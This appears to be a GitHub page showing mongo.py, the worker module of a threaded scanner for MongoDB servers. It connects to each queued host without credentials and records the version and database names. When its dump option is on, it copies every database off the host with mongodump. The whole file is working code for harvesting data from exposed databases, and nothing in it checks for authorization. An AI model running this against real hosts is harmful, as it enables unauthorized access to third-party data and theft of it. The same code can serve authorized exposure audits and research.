-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathmongo.py
107 lines (91 loc) · 3.41 KB
/
mongo.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
import os
import threading
import time
from queue import Queue
from subprocess import CalledProcessError, Popen, check_call
from typing import List, NamedTuple, Optional, Tuple

from pymongo import MongoClient
from pymongo.errors import ConnectionFailure, ConfigurationError

from writer import write_log
# Server selection timeout handed to MongoClient, in milliseconds.
DEFAULT_TIMEOUT = 10_000
class ConnectionWorkerOptions(NamedTuple):
    """Immutable settings shared by the connection workers."""

    # Base output directory; per-host dump folders and the log file live here.
    out: str
    # Name of the log file, resolved relative to ``out``.
    file: str
    # When true, every database of a reachable host is dumped with mongodump.
    dump: bool
class ConnectionWorker(threading.Thread):
    """Worker thread that probes MongoDB hosts taken from a shared queue.

    For every host pulled from the queue the worker opens a client, reads the
    server version and the database names, optionally dumps each database
    with ``mongodump`` and appends a report to the log file.
    """

    def __init__(
        self, queue: Queue, id: int, options: "ConnectionWorkerOptions"
    ):
        """Store the work queue, the worker number and the run options.

        Args:
            queue: Queue of host strings; each item is passed to
                ``MongoClient``.
            id: Number used to tag this worker's progress messages.
            options: Output directory, log file name and dump flag.
        """
        super().__init__()
        self.queue = queue
        self.id = id
        self.options = options

    def close(self, client):
        """Close the given client."""
        client.close()

    def test_open_connection(
        self, client, ip: str
    ) -> Tuple[Optional[List[str]], Optional[str]]:
        """Query the server behind ``client`` for its databases and version.

        Args:
            client: Connected client object (a ``MongoClient`` in ``run``).
            ip: Host the client points at; only used in the failure message.

        Returns:
            ``(database_names, version)`` on success, ``(None, None)`` when
            the connection fails.
        """
        try:
            info = client.server_info()
            version = info.get("version", "")
            # database_names() was removed in PyMongo 4; on a MongoClient the
            # attribute now resolves to a Database object and calling it
            # raises TypeError. list_database_names() is the replacement.
            dbs = client.list_database_names()
        except ConnectionFailure:
            print(f"[{ip}]: connection failed")
            return None, None
        return dbs, version

    def dump_databases(self, ip: str, dbs: List[str]) -> List[str]:
        """Dump every database in ``dbs`` from ``ip`` using ``mongodump``.

        Each database is written to ``<out>/<ip>/<db>-<timestamp>``. A
        database whose dump fails is reported and skipped so the remaining
        ones are still attempted.

        Args:
            ip: Host to dump from.
            dbs: Database names to dump; ``None`` or empty means nothing to do.

        Returns:
            The names of the databases that were dumped successfully. Always
            a list, possibly empty.
        """
        dumped: List[str] = []
        if not dbs:
            return dumped

        base_ip_dir = f"{self.options.out}/{ip}"
        timestr = time.strftime("%Y-%m-%d-%H%M%S")

        try:
            # exist_ok avoids the check-then-create race between workers that
            # receive the same host.
            os.makedirs(base_ip_dir, exist_ok=True)
        except OSError as exc:
            print(
                f"[{ip}]: cannot create dump directory '{base_ip_dir}': {exc}"
            )
            return dumped

        for db in dbs:
            # Explicit argument list: no shell is involved and paths or names
            # containing whitespace stay a single argument.
            cmd = [
                "mongodump",
                "--quiet",
                "--host",
                ip,
                "-d",
                db,
                "-o",
                f"{base_ip_dir}/{db}-{timestr}",
            ]
            try:
                # check_call blocks until mongodump exits and raises
                # CalledProcessError on a non-zero exit status, so reaching
                # the append below means the dump succeeded.
                check_call(cmd)
            except (CalledProcessError, OSError) as exc:
                # OSError covers a missing or non-executable mongodump binary.
                print(f"[{ip}]: failed to dump '{db}': {exc}")
                continue
            dumped.append(db)
        return dumped

    def log_opened_connection(
        self, ip: str, version: str, dbs: List[str], dumped_dbs: List[str]
    ):
        """Append a report about a reachable host to the log file.

        Args:
            ip: Host that accepted the connection.
            version: Server version string.
            dbs: Database names found on the server.
            dumped_dbs: Names of the databases that were dumped; may be empty
                or ``None`` when nothing was dumped.
        """
        dumped_str = ""
        if dumped_dbs:
            dumped_str = (
                "\n".join(f"[{ip}]: Dumped '{d_db}'" for d_db in dumped_dbs)
                + "\n"
            )
        write_log(
            f"{self.options.out}/{self.options.file}",
            f"[{ip}]: opened connection.\n"
            f"\t├─ Version: {version}\n"
            f"\t└─ Databases: {dbs}\n"
            f"{dumped_str}\n"
            f"------------------------------------------------\n",
        )

    def run(self):
        """Process hosts from the queue forever.

        Every item taken from the queue is acknowledged with ``task_done()``
        exactly once and its client is closed, whatever happens while probing
        the host, so a failing host cannot stall ``queue.join()``.
        """
        while True:
            ip = self.queue.get()
            print(f"[Worker {self.id}] => Started {ip}")
            client = None
            try:
                client = MongoClient(
                    ip, serverSelectionTimeoutMS=DEFAULT_TIMEOUT
                )
                dbs, version = self.test_open_connection(client, ip)
                if dbs is not None and version is not None:
                    dumped_dbs = []
                    if self.options.dump:
                        dumped_dbs = self.dump_databases(ip, dbs)
                    self.log_opened_connection(ip, version, dbs, dumped_dbs)
            except ConfigurationError:
                # The client rejected this host entry; skip it silently.
                pass
            except Exception as exc:
                # Worker boundary: report and move on to the next host rather
                # than letting one bad host kill the thread.
                print(f"[{ip}]: unexpected error: {exc}")
            finally:
                if client is not None:
                    self.close(client)
                self.queue.task_done()